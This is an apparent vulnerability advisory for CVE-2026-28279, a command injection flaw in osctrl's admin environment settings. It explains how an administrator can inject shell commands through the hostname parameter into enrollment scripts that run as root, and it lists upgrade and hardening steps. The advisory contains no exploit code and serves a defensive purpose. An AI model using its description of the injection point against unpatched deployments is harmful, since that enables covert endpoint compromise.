The vulnerability CVE-2026-28279 affects jmpsec's osctrl, an osquery management solution, in versions before 0.5.0. It is an OS command injection flaw (CWE-78) located in the osctrl-admin environment configuration interface. Specifically, an authenticated administrator can manipulate the hostname parameter when creating or editing environments to inject arbitrary shell commands. These commands are incorporated into enrollment one-liner scripts generated using Go's text/template package, which lacks shell escaping capabilities. Consequently, every endpoint enrolling with the compromised environment executes these injected commands with root or SYSTEM privileges before osquery is installed. This execution context means no agent-level audit logs are generated, allowing attackers to install persistent backdoors, exfiltrate credentials, and fully compromise endpoints. The vulnerability requires high privileges (administrator access) and user interaction (enrollment of endpoints) but has a broad scope since it affects all endpoints enrolling with the environment. The vulnerability is fixed in osctrl version 0.5.0. No known exploits are reported in the wild yet, but the impact potential is significant due to the high privilege and stealthy execution. Workarounds include restricting administrator access to trusted personnel, auditing environment configurations for suspicious hostnames, and monitoring enrollment scripts for unexpected commands.

This vulnerability enables attackers with administrator access to achieve remote code execution on all endpoints enrolling with a compromised environment, executing commands as root or SYSTEM before osquery installation. This can lead to complete endpoint compromise, including backdoor installation, credential theft, and lateral movement within networks. The lack of agent-level audit trails during execution increases stealth, making detection and forensic analysis difficult. Organizations using osctrl for osquery management face risks of widespread compromise across their endpoint fleet, potentially affecting sensitive data confidentiality, system integrity, and availability. The attack requires administrator privileges on osctrl, so insider threats or compromised administrator accounts pose the greatest risk. The vulnerability's exploitation could severely disrupt enterprise security monitoring and incident response capabilities, as osquery is often used for endpoint visibility and threat detection.

1. Upgrade osctrl to version 0.5.0 or later immediately to apply the official fix. 2. Restrict osctrl administrator access strictly to trusted and vetted personnel to reduce the risk of malicious configuration changes. 3. Conduct thorough audits of existing environment configurations, focusing on the hostname parameter, to detect any suspicious or unexpected command injections. 4. Monitor enrollment one-liner scripts for anomalous or unauthorized commands before deployment to endpoints. 5. Implement multi-factor authentication and strong access controls on the osctrl administrative interface to prevent unauthorized access. 6. Use network segmentation and endpoint protection to limit the impact if an endpoint is compromised. 7. Establish logging and alerting mechanisms external to osquery agents to detect unusual enrollment activities or environment changes. 8. Educate administrators on secure configuration practices and the risks of command injection vulnerabilities.